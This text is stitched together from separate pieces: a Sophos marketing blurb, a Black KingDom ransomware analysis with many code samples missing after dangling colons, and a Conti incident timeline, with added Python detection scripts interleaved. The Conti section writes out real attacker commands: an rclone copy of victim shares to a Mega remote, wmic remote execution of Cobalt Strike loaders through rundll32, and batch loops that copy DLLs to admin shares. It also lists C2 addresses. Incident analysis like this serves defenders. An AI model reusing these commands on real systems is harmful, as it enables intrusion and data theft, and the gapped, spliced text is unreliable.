Sophos Ransomware Detection



Ransomware continues to be a top cyber threat, with 30% of organizations admitting to having been victimized in the past. IT security is the responsibility of everyone within an organization, so it falls to IT managers to educate their workforces on how best to safeguard against attacks. Sophos Home scans downloaded programs in real time and analyzes data from questionable websites and servers to detect malicious files and hidden keylogger spyware, and it stops malware from stealing your information by encrypting your keystrokes. As Sophos found in its State of Ransomware 2020 survey, only 24% of organizations breached in a ransomware incident were able to detect the intrusion and stop it before their files were encrypted. Sophos' new EDR capabilities help security and IT teams detect threats and breaches that could otherwise take months to uncover.

Following the DearCry ransomware attacks reported on last week, another ransomware gang has also started to target vulnerable Exchange servers with another ransomware, called Black KingDom. Sophos telemetry began detecting the ransomware on Thursday March 18 as it targeted Exchange servers that remain unpatched against the ProxyLogon vulnerabilities disclosed by Microsoft earlier this month.

The Black KingDom ransomware is far from the most sophisticated payload we’ve seen. In fact, our early analysis reveals that it is somewhat rudimentary and amateurish in its composition, but it can still cause a great deal of damage. It may be related to a ransomware of the same name that appeared last year on machines that, at the time, were running a vulnerable version of the Pulse Secure VPN concentrator software.

Delivered through a webshell that was sent over Tor

The delivery of Black KingDom was orchestrated from a remote server with an IP address that geolocates to Germany, 185.220.101.204, while the attacker operated from 185.220.101.216. Because both addresses are Tor exit nodes, the geolocation only tells you where the exit node sits; it is impossible to know where the attackers are physically located.

The threat actor exploited on-premises versions of Microsoft Exchange Server through the vulnerability chain known as ProxyLogon: CVE-2021-26855, a pre-authentication server-side request forgery, combined with CVE-2021-27065, a post-authentication arbitrary file write, which together give remote code execution (RCE). CVE-2021-27065 is the half of the chain that lets the attacker write the webshell to disk.

After successfully breaching the Exchange server, the adversary delivered a webshell. This webshell offers remote access to the server and allows the execution of arbitrary commands.

The webshell ChackLogsPL.aspx was dropped here:

Other filenames of webshells we have observed being used by this adversary are ckPassPL.aspx and hackIdIO.aspx.

The webshell was written to disk by w3wp.exe, the Internet Information Services (IIS) worker process that hosts the Exchange admin center (EAC), which Microsoft refers to internally as ECP (Exchange Control Panel). A worker process for the ECP application creating .aspx files is itself a strong indicator of this attack:

Ransomware execution and behavior

Following the deployment of the webshell, the attackers initiate the attack by issuing a PowerShell command (not shown here in its entirety due to size constraints):

This decodes to the following script (amended to enhance readability):

This script downloads the ransomware payload from:

The $(f1) part is generated by the function f1, which returns a random string of 15 alphabetic characters. The exact web address therefore looks something like this:

(As we went to press, the yuuuu44 domain was redirecting visitors to NASA.GOV)

The attackers store the ransomware payload in the \\[ComputerName]\c$\Windows\system32 folder, reached over the administrative share, with a random filename generated by that same function, f1. For example:

The script executes the ransomware by invoking Win32_Process via WMI (Windows Management Instrumentation). Because the script addresses the target by computer name and admin share, it also includes the ability to copy the ransomware to other computers on the network and execute it there.
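As an added example (not Sophos' tooling or telemetry, and not the attacker's script), the following Python turns the delivery chain described above into two detection rules and runs them over a handful of constructed Sysmon-style events: an .aspx file written by w3wp.exe (the webshell drop), and a binary with a 15-letter random basename launched directly from System32 under WmiPrvSE.exe, the host process that Win32_Process.Create uses for its children. The field names follow Sysmon's schema; the file paths in the sample events are placeholders rather than the paths from the incident, and the optional .exe extension on the payload name is an assumption, since the article does not show the final filename.

```python
import re

# Sysmon event IDs (assumed telemetry source): 1 = process create, 11 = file create
PROCESS_CREATE = 1
FILE_CREATE = 11

# f1() in the attacker's PowerShell yields 15 alphabetic characters and the
# payload lands in \\host\c$\Windows\system32 under that name. Whether an
# extension is appended is not stated in the article, so .exe is optional here.
RANDOM_NAME = re.compile(r"^[A-Za-z]{15}(\.exe)?$")
SYSTEM32 = re.compile(r"^[A-Za-z]:\\Windows\\System32\\[^\\]+$", re.IGNORECASE)


def basename(path):
    return path.rsplit("\\", 1)[-1]


def is_webshell_drop(ev):
    """The IIS worker process that hosts ECP has no business writing .aspx files."""
    return (ev["EventID"] == FILE_CREATE
            and basename(ev["Image"]).lower() == "w3wp.exe"
            and ev["TargetFilename"].lower().endswith(".aspx"))


def is_wmi_spawned_random_binary(ev):
    """Win32_Process.Create runs its child under WmiPrvSE.exe; a child living
    directly in System32 with a 15-letter name matches the f1() pattern."""
    return (ev["EventID"] == PROCESS_CREATE
            and basename(ev["ParentImage"]).lower() == "wmiprvse.exe"
            and SYSTEM32.match(ev["Image"]) is not None
            and RANDOM_NAME.match(basename(ev["Image"])) is not None)


def triage(events):
    """Return (rule, artefact) pairs for every event that matches a rule."""
    hits = []
    for ev in events:
        if is_webshell_drop(ev):
            hits.append(("webshell_drop", ev["TargetFilename"]))
        elif is_wmi_spawned_random_binary(ev):
            hits.append(("wmi_random_binary", ev["Image"]))
    return hits


# Constructed sample events; the paths are placeholders, not incident data.
SAMPLE_EVENTS = [
    {"EventID": FILE_CREATE,
     "Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "TargetFilename": r"C:\example\ecp\ChackLogsPL.aspx"},
    {"EventID": FILE_CREATE,
     "Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "TargetFilename": r"C:\example\ecp\trace.log"},
    {"EventID": PROCESS_CREATE,
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\qwertyuiopasdfg.exe"},
    {"EventID": PROCESS_CREATE,
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "Image": r"C:\Windows\System32\cmd.exe"},
    {"EventID": PROCESS_CREATE,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\qwertyuiopasdfg.exe"},
]

if __name__ == "__main__":
    for rule, artefact in triage(SAMPLE_EVENTS):
        print(f"{rule}: {artefact}")
```

The first rule is close to zero-noise on an Exchange server and is the one to alert on unconditionally. The second is a heuristic: legitimate software rarely drops 15-letter binaries into System32 via WMI, but before paging anyone on it, cross-check the parent's own lineage and the server's ProxyLogon patch level.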

Impact


The ransomware binary is based on a Python script that has been compiled into an executable using a tool called PyInstaller. With some effort we were able to decompile the binary back into its original source code, which helped us understand the ransomware’s functionality. The creator named the source code 0xfff.py, the “fff” of which represents a hexadecimal value for the decimal number 4095. What the significance of this is remains a mystery.

The ransomware has a built-in block list of folders the contents of which it will not encrypt:

It attempts to stop every service running on the machine with SQL in the service name, effectively terminating database engines, presumably so that the database files they would otherwise hold open can be encrypted as well:

The encryption key is generated with the following code:

The call to gen_string produces a random string 64 characters long. The script then hashes that value with MD5 and uses the hexadecimal digest as the encryption key, so whatever the length of the seed, the key carries at most 128 bits of entropy.

It also generates a gen_id, a victim identifier that the ransomware embeds in the ransom note so victims can tell the threat actor who they are and purchase the correct decryption key.

The key and gen_id are then uploaded to an account on mega.io. If for whatever reason the ransomware is unable to upload the randomly generated encryption key to Mega, it falls back to a hardcoded, static key, which every victim in that situation therefore shares:

The base64-encoded key represents this hexadecimal value: eebf143cf615ecbe2ede01527f8178b3
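The key handling just described, reimplemented in Python as an added example; this is not the decompiled 0xfff.py. It reproduces the derivation (64 random characters, MD5, hex digest used as the key), normalises the static fallback key from base64 to hex, and gives an incident responder a check for whether a key recovered from memory or a ransom note is that fallback. The alphabet used by gen_string and the exact base64 form of the fallback are assumptions; the hex value eebf143cf615ecbe2ede01527f8178b3 is the one quoted above.

```python
import base64
import hashlib
import secrets
import string

# Hex value of the hardcoded fallback key quoted in the article.
STATIC_KEY_HEX = "eebf143cf615ecbe2ede01527f8178b3"

# Assumption: letters and digits. The article only says "64 characters".
ALPHABET = string.ascii_letters + string.digits


def gen_string(length=64):
    """Random seed string, playing the role of gen_string() in the ransomware."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def derive_key(seed):
    """MD5 hex digest of the seed. The 64 random characters collapse to a
    128-bit digest, so the key has at most 128 bits of entropy even though
    the 32-character hex string is 32 bytes long."""
    return hashlib.md5(seed.encode("ascii")).hexdigest()


def decode_static_key(b64):
    """Normalise the base64 fallback to lowercase hex, whether the malware
    encoded the 32-character hex string or the 16 raw key bytes (assumption:
    one of these two forms; the article shows only the decoded hex)."""
    raw = base64.b64decode(b64, validate=True)
    if len(raw) == 16:
        return raw.hex()
    text = raw.decode("ascii")
    if len(text) == 32 and all(c in string.hexdigits for c in text):
        return text.lower()
    raise ValueError("unrecognised key encoding")


def static_key_variants():
    """Both plausible base64 encodings of the fallback key."""
    return [base64.b64encode(STATIC_KEY_HEX.encode("ascii")).decode(),
            base64.b64encode(bytes.fromhex(STATIC_KEY_HEX)).decode()]


def used_fallback_key(recovered_key_hex):
    """IR check: a recovered key equal to the static fallback means the Mega
    upload failed and the key is already public knowledge, so recovery does
    not depend on the attacker."""
    return recovered_key_hex.strip().lower() == STATIC_KEY_HEX


if __name__ == "__main__":
    seed = gen_string()
    print("seed:", seed)
    print("key :", derive_key(seed))
    for variant in static_key_variants():
        print(variant, "->", decode_static_key(variant))
    print("fallback used:", used_fallback_key(STATIC_KEY_HEX))
```

The practical point for responders is the last function: if a memory capture of the running process, or a victim's note, carries the fallback value, the encryption key never left the machine and decryption is a matter of identifying the cipher and mode the binary used, which the decompiled source settles.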

The file system behavior of the file encryption function is straightforward: Read (original) > Overwrite (encrypted) > Rename:

This translates into the following file system activity:

The code for renaming the now-encrypted files chooses a random string between 4 and 7 characters and appends that to the filename, so its suffix no longer maps to the application it’s supposed to:

To prevent encrypted files from being attacked twice, ransomware generally appends the same uniquely chosen file extension to every encrypted file or places a marker in the file header (or at its end). The Black KingDom ransomware targeting Exchange servers does neither: it does not check whether a file or the machine has been hit before, by itself or by another ransomware. As a result, files can be encrypted multiple times over, even by the same ransomware, which makes decryption considerably more complicated because each layer has to be unwound in the right order with the right key. This oversight is probably unintentional, but could have been anticipated.
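An added example (not Sophos' or the malware's code) that puts the renaming and double-encryption observations above to use during triage: given a file listing from an affected share, it peels off Black KingDom-style suffixes to recover the probable original name and counts how many encryption passes each file appears to have suffered, which is exactly the information a recovery plan needs before any decryption attempt. The suffix alphabet (lowercase letters and digits) and the allowlist of legitimate long extensions are assumptions; the file listing is constructed.

```python
import re
from collections import Counter

# Legitimate extensions that are 4-7 characters long and must not be peeled
# off as a ransomware suffix. Assumption: this allowlist, and the suffix
# alphabet below, neither of which the article specifies.
LEGIT_LONG_EXT = {"docx", "xlsx", "pptx", "html", "json", "yaml", "jpeg",
                  "backup", "sqlite", "config", "accdb", "dump"}
SUFFIX = re.compile(r"\.([a-z0-9]{4,7})$", re.IGNORECASE)


def peel(name):
    """Strip Black KingDom-style suffixes from a file name.
    Returns (probable original name, number of suffixes removed). A count of
    2 or more means the file was encrypted more than once, which the article
    notes the malware does nothing to prevent."""
    passes = 0
    while True:
        m = SUFFIX.search(name)
        if not m or m.group(1).lower() in LEGIT_LONG_EXT:
            return name, passes
        name = name[:m.start()]
        passes += 1


def scan(listing):
    """Map each apparently encrypted path to (probable original path, passes)."""
    findings = {}
    for path in listing:
        head, sep, name = path.rpartition("\\")
        original, passes = peel(name)
        if passes:
            findings[path] = (head + sep + original, passes)
    return findings


def pass_histogram(findings):
    """How many files were hit once, twice, and so on."""
    return Counter(passes for _, passes in findings.values())


# Constructed file listing, not data from the incident.
SAMPLE_LISTING = [
    r"D:\share\budget.xlsx.k3p9q",
    r"D:\share\payroll.docx.ab12.x9y8z7",
    r"D:\share\photo.jpg.qf7a",
    r"D:\share\README.m4kd9",
    r"D:\share\readme.txt",
    r"D:\share\notes.backup",
    r"D:\share\decrypt_file.TxT",
]

if __name__ == "__main__":
    findings = scan(SAMPLE_LISTING)
    for path, (original, passes) in findings.items():
        print(f"{path} -> {original} (encrypted {passes}x)")
    print(dict(pass_histogram(findings)))
```

Because the malware leaves no marker, this is necessarily a heuristic: a legitimate file whose extension is four to seven alphanumerics and not in the allowlist will be reported as encrypted once. Diffing the listing against a pre-incident backup catalogue removes that noise; the pass counts are the part to trust, since a genuine second suffix on top of a known extension has no innocent explanation.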

Our CryptoGuard protection caught the ransomware attempting to encrypt data. Below, raw telemetry from our signature-agnostic technology shows the ransomware binary being executed via WMI as documented above (read the Process Trace sequence backwards, from 3 to 1):

To further complicate and hinder incident response, the ransomware deletes the Windows Event logs:

Once the system is encrypted (or after 20 minutes of work), the ransomware runs this subroutine that disables the mouse and keyboard, and draws a full screen window on top of the desktop.

This generates a full-screen window that looks like this, complete with countdown timer:

Alongside the encrypted data a ransom note is stored in a file named decrypt_file.TxT:

Here is a current overview of the transactions received by the attackers’ cryptocurrency wallet, according to BitRef. It seems at least one victim has paid the ransom demand and the attackers have already withdrawn the money from the wallet:

Detection guidance

Users of Sophos endpoint protection products may see the webshells detected as any of the long list of detections in this post, and the ransomware payload may be detected as Troj/Ransom-GFU, Troj/Ransom-GFV or Troj/Ransom-GFP or by the CryptoGuard feature within Intercept X. SophosLabs has published indicators of compromise to the SophosLabs Github. Threat hunters using Sophos EDR may also use the queries posted in this article to find additional indicators of compromise on their networks.

Acknowledgments

SophosLabs would like to acknowledge the contributions of Vikas Singh, Alex Vermaning and Gabor Szappanos to this report.

Editor’s note: This is one of a series of articles focused on the Conti ransomware family, which include technical details of the Conti ransomware, Conti ransomware: Evasive by nature, and a guide IT administrators can use to deal with the impact of an attack involving Conti ransomware, What to expect when you’ve been hit with Conti ransomware.

Conti ransomware is a global threat affecting victims mainly in North America and Western Europe. Sophos Rapid Response has encountered multiple confirmed Conti ransomware attacks in the past six months. Sophos operators also strongly believe they encountered what would have been another incident of Conti had they not stopped the attack before ransomware was deployed.

Since its first appearance, Conti was assumed to be the successor to Ryuk with one crucial difference in that the group behind Conti threatens to leak exfiltrated data to strong-arm victims into paying the ransom. This use of exfiltrated data means organizations from almost any industry could be targeted, although the Conti group has hit organizations in retail, manufacturing, construction, and the public sector more often.

One confirmed case involved an attack on an organization that was able to remove the attacker from one server, only to find the attacker had gained access to two servers at the same time. Despite the company's efforts, Sophos Rapid Response needed to be called in to deal with a Conti ransomware attack against nearly 300 endpoints.

It took just over 2.5 hours for the Rapid Response team to determine what accounts and devices were affected, what tools were used in the attack, block the attack from continuing, and walk the customer through the process of the Rapid Response engagement.

In less than 24 hours after Rapid Response was engaged, most of the customer’s critical infrastructure was able to restart normal operation, and within 48 hours, the team confirmed the initial access point of the attack.

A thorough incident response plan is key to dealing with a similar Conti ransomware attack. Check out the Sophos IT admin’s guide to What to expect when you’ve been hit with Conti ransomware.

Let’s dig into the Conti attack, day-by-day, and in some cases minute-by-minute.

Day 1 – Initial access and scans

The initial access point for the attack was eventually determined to be a FortiGate firewall running vulnerable firmware, version 5.6.3 build 1547(GA). Once inside, the attacker gained access to two different servers simultaneously, down to the exact second.

It took the attacker exactly 16 minutes to exploit the vulnerable firewall and gain domain admin access to the two servers.

Over the next six hours, the attacker deployed a Cobalt Strike beacon on one of the servers and began running commands to enumerate domain controllers, domain admin accounts, domain trusts and shares:

cmd.exe /C nltest /dclist:[target company name]
cmd.exe /C net group "domain Admins" /domain
cmd.exe /C nltest /DOMAIN_TRUSTS
cmd.exe /C adft.bat
cmd.exe /C type shares.txt

And commands to map out the basic network topology:

ping <computer name>.<domain>.local -n 1
cmd.exe /C portscan <IP ranges> icmp 1024

On the second server, the attacker did nothing at first.

The victim identified and shut down the attack in progress on one server; unfortunately, they did not detect the access the attacker had to the other server.

After the victim shut down the attacker's access to the first server, it took just 15 minutes for the attacker to pivot to the second server, deploy another Cobalt Strike beacon and resume the attack. The attacker then used the compromised domain admin account to gain access to a third server and ran the following Windows Management Instrumentation (WMI) command to remotely deploy another Cobalt Strike beacon on it:

cmd.exe /C wmic /node:<IP Address> process call create "rundll32.exe C:\Programdata\sys.dll entryPoint"

Day 2

On the second day, Sophos did not detect any malicious activity.

Day 3 – Data exfiltration and credential gathering

Over the course of 10 hours on the third day of the attack, the threat actors identified directories with potentially valuable data and began exfiltration.

The directories exfiltrated included data from the Human Resources department, IT department, credit department, accounting, senior staff, and directories labeled as budget.

To move the data, the attacker deployed RClone on the third server and created a config file containing the email and password for the Mega account that received the exfiltrated data:

rclone.exe copy "\\<Server 3>\<Folder path>" remote:<victim name> -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12
C:\Users\<compromised domain admin>\.config\rclone\rclone.conf

The attacker also executed a batch script, cp.bat, to search for stored user credentials by copying every XLSX file with the string "pas" in its filename.

Day 4 – Conti attacks and beginning of Rapid Response engagement

On day one of the attack, the threat actors had gathered a map of the victim’s network and saved text file lists of the endpoints and servers. At approximately 1:00 am local time on day 4, the attacker used batch scripts to loop through those lists of devices in order to copy Cobalt Strike loaders onto a total of nearly 300 endpoints and servers.

First, the attacker deployed a Cobalt Strike beacon to a fourth server as a test:

cmd.exe /C wmic /node: <Server 4 IP Address> process call create "rundll32.exe C:\Programdata\doc.dll entryPoint"

Next, the attacker executed a batch script, copy_files_srv.bat, to deploy the Cobalt Strike loader, doc.dll, on the target servers listed in srv.txt:

for /f %%i in (srv.txt) do copy "C:\ProgramData\doc.dll" \\%%i\c$\ProgramData\doc.dll

Then, the attacker executed another batch script, wm_start.bat, to run the Cobalt Strike loader on each server listed in srv.txt via rundll32.exe and initiate the beacon:

for /f %%i in (srv.txt) do wmic /node: %%i process call create "rundll32.exe C:\Programdata\doc.dll entryPoint"

These last two commands were then repeated with the batch script, copy_files_work.bat, and text file work.txt to deploy and initiate the Cobalt Strike beacons onto nearly 300 target endpoints on the victim’s network.
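As an added example (not Sophos' detection content and not the operator's scripts), here is the Day 1 to Day 4 command set turned into simple process-creation detections in Python. Each match is labelled with an ATT&CK technique ID, and a fan-out check covers the wm_start.bat loop: one remote wmic call is ordinary administration, but one host creating processes on many distinct nodes inside an hour is the deployment step that put loaders on nearly 300 machines. The records are constructed from the commands quoted above with victim values replaced by placeholders (corp.example, 10.0.0.x, SRV1 to SRV3); the regexes and the threshold are illustrative, and T1087.002 for the net group step and T1218.011 for the rundll32 loader are my mappings rather than ones taken from this article.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (label, pattern, ATT&CK technique). Patterns are written against the command
# lines quoted in this article and are illustrative, not tuned for production.
RULES = [
    ("nltest domain controller list", re.compile(r"\bnltest\b.*?/dclist", re.I), "T1018"),
    ("net group domain admins", re.compile(r'\bnet1?\b\s+group\s+"?domain admins"?\s+/domain', re.I), "T1087.002"),
    ("beacon portscan", re.compile(r"\bportscan\b", re.I), "T1046"),
    ("remote WMI process create", re.compile(r"\bwmic(\.exe)?\b.*?/node:.*?process\s+call\s+create", re.I), "T1047"),
    ("rundll32 loader with export", re.compile(r"\brundll32(\.exe)?\b\s+\S+\.dll\s+\w+", re.I), "T1218.011"),
    ("copy to admin share", re.compile(r"\bcopy\b.*?\\\\[\w.-]+\\[a-z]\$\\", re.I), "T1021.002"),
    ("rclone transfer", re.compile(r"\brclone(\.exe)?\b\s+(copy|sync|move)\b", re.I), "T1567.002"),
]
WMI_RULE = RULES[3][1]
NODE = re.compile(r"/node:\s*([\w.-]+)", re.I)


def classify(cmdline):
    """ATT&CK technique IDs whose rule matches the command line, in rule order."""
    return [tech for _, pat, tech in RULES if pat.search(cmdline)]


def triage(records):
    """(host, cmdline, techniques) for every record matching at least one rule."""
    out = []
    for _, host, cmd in records:
        techs = classify(cmd)
        if techs:
            out.append((host, cmd, techs))
    return out


def wmi_fanout(records, window=timedelta(minutes=60), threshold=3):
    """Hosts that issued remote WMI process creation against at least
    `threshold` distinct targets inside any `window`. Returns {host: peak}."""
    by_host = defaultdict(list)
    for ts, host, cmd in records:
        m = NODE.search(cmd)
        if m and WMI_RULE.search(cmd):
            by_host[host].append((datetime.fromisoformat(ts), m.group(1)))
    alerts = {}
    for host, calls in by_host.items():
        calls.sort()
        peak = 0
        for i, (start, _) in enumerate(calls):
            targets = {node for t, node in calls[i:] if t - start <= window}
            peak = max(peak, len(targets))
        if peak >= threshold:
            alerts[host] = peak
    return alerts


# Constructed records (timestamp, source host, command line), modelled on the
# commands quoted in this article; hosts and addresses are placeholders.
SAMPLE_RECORDS = [
    ("2021-01-11T10:00:00", "SRV1", r"cmd.exe /C nltest /dclist:corp.example"),
    ("2021-01-11T10:01:00", "SRV1", r'cmd.exe /C net group "domain Admins" /domain'),
    ("2021-01-11T10:20:00", "SRV1", r"cmd.exe /C portscan 10.0.0.0/24 icmp 1024"),
    ("2021-01-13T15:00:00", "SRV3", r'rclone.exe copy "\\SRV3\finance" remote:victim -q --ignore-existing --auto-confirm --multi-thread-streams 12 --transfers 12'),
    ("2021-01-14T01:00:00", "SRV2", r'cmd.exe /C wmic /node: 10.0.0.40 process call create "rundll32.exe C:\Programdata\doc.dll entryPoint"'),
    ("2021-01-14T01:05:00", "SRV3", r'copy "C:\ProgramData\doc.dll" \\10.0.0.11\c$\ProgramData\doc.dll'),
    ("2021-01-14T01:06:00", "SRV3", r'cmd.exe /C wmic /node: 10.0.0.11 process call create "rundll32.exe C:\Programdata\doc.dll entryPoint"'),
    ("2021-01-14T01:07:00", "SRV3", r'cmd.exe /C wmic /node: 10.0.0.12 process call create "rundll32.exe C:\Programdata\doc.dll entryPoint"'),
    ("2021-01-14T01:08:00", "SRV3", r'cmd.exe /C wmic /node: 10.0.0.13 process call create "rundll32.exe C:\Programdata\doc.dll entryPoint"'),
    ("2021-01-14T01:30:00", "SRV1", r"cmd.exe /C dir C:\Temp"),
]

if __name__ == "__main__":
    for host, cmd, techs in triage(SAMPLE_RECORDS):
        print(host, techs, cmd[:60])
    print("WMI fan-out:", wmi_fanout(SAMPLE_RECORDS))
```

The fan-out threshold of three exists only to make the sample fire; in a real estate it should sit well above whatever your patch-management or inventory tooling does with wmic, but still far below the hundreds of targets seen here. The single "test" call from SRV2 is deliberately below it, which mirrors how the fourth-server test in this incident would have looked: low-signal on its own, obvious in hindsight.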

The Cobalt Strike beacons were kicked into gear 40 minutes after being loaded onto the target devices and used a technique called reflective DLL injection to launch Conti.

“A DLL file dropped onto the target devices connects to a C2 address and gets the ransomware code hosted there. The ransomware code is then executed directly in memory, meaning when it starts encrypting the target machine it has never been written to disk,” Peter Mackenzie, manager of Rapid Response, said. “Despite how clever this is, Sophos Intercept X technology would still have no problem stopping it.”

The C2 addresses used were:

  • Docns[.]com/us/ky/louisville/312-s-fourth-st.html
  • docns[.]com/OrderEntryService.asmx/AddOrderLine
  • 23[.]106[.]160[.]174
  • 91[.]199[.]212[.]52

Over the course of the next 3 hours, Sophos Intercept X successfully detected and blocked Conti on all of the protected computers, but damage was done to unprotected devices. For more on how the reflective DLL injection and the Conti ransomware worked, check out the technical details on Conti ransomware by Sophos Uncut.

The customer blocked all internet traffic except Sophos, shut down critical infrastructure, and called Sophos Rapid Response.

Within the first 45 minutes of being under contract, before even having the kickoff call to walk the customer through the service, the Rapid Response team had:

  • Identified the compromised account used in the attack
  • Identified and blocked the malicious DLL used to deploy Conti
  • Identified and blocked the command and control (C2) addresses used by the attacker
  • Identified all endpoints targeted
  • Deployed Sophos Managed Threat Response (MTR) to the customer environment
  • Begun collecting forensic evidence

In the 45 minutes following the kickoff call, the Rapid Response team also built a list of all the data exfiltrated by the attacker.

Day 5 – Back to normal

By the fifth day after the attacker first gained access to the victim’s network, and less than 24 hours from when Sophos Rapid Response was called in, the customer was able to restart most of their critical infrastructure to normal operation.

With the help of Rapid Response, all unprotected machines were recovered from backups or re-imaged and then protected with Sophos, and multi-factor authentication was enabled on the customer's VPN.

The investigation for Rapid Response was not over yet though. The team identified a possible second exfiltration of data, a second compromised account, and suspicious Remote Desktop Protocol (RDP) traffic through the vulnerable firewall.

Day 6 and 7 – Finishing up and handing off

With the attack stopped and recovery complete, all that was left was a bit of cleanup, including confirming the initial access method for the attacker and having the customer upgrade their firewall to close that vulnerable point.

Sophos Rapid Response then handed off the customer to the Sophos Managed Threat Response team to continue 24/7 monitoring.

Detection and IoCs

Components of Conti ransomware can be detected in Sophos Endpoint Protection under the following definitions: HPmal/Conti-B, Mem/Conti-B, or Mem/Meter-D.

Additional indicators of compromise have been published to the SophosLabs Github.


Conti group Tactics, Techniques, and Procedures (TTPs)

In this case, the Conti group gained initial entry into the victim environment by exploiting a public-facing application (MITRE ATT&CK T1190) and used a compromised domain admin account (MITRE ATT&CK T1078.002, Valid Accounts: Domain Accounts) to facilitate lateral movement.


The threat actor exploited a vulnerability in FortiGate firewall version 5.6.3 build 1547(GA). Known exploits for this vulnerable firmware include one critically rated vulnerability (CVE-2018-13379) and one high rated vulnerability (CVE-2018-13374).

The group used multiple batch scripts for system network configuration discovery (MITRE ATT&CK T1016), remote system discovery (MITRE ATT&CK T1018), and network service scanning (MITRE ATT&CK T1046). Immediately following initial access, the threat actor enumerated domain admin accounts (MITRE ATT&CK T1087.002, Account Discovery: Domain Account) and network shares (MITRE ATT&CK T1135), and later used the c$ admin shares to stage loaders on other hosts (MITRE ATT&CK T1021.002).

Deployment of Cobalt Strike beacons and loaders were performed using Windows Management Instrumentation commands (MITRE ATT&CK T1047).

The threat actor used RClone in order to exfiltrate data to file storage service MEGA (MITRE ATT&CK T1567.002).

Cobalt Strike beacons loaded onto all target systems performed a reflective DLL injection attack (MITRE ATT&CK T1055.001): a DLL called out to the C2 addresses to fetch the Conti code, then loaded and executed it directly in memory, so the ransomware was never written to disk before it encrypted data for impact (MITRE ATT&CK T1486).

If you are experiencing an active incident and need immediate response, contact Sophos Rapid Response. For details of our 24/7 Managed Threat Response (MTR) service, visit our website or speak with your Sophos representative.


Special thanks to Abhijit Gupta, Bill Kearney, David Anderson, Elida Leite, Kevin Simpson, Matthew Sharf, Paul Jacobs, Peter Mackenzie, Ratul Ghosh, Robert Weiland, Sergio Bestulic, Syed Shahram Ahmed, Varun Hirve, and Vikas Singh for their efforts in detecting, investigating, and responding to these threats.




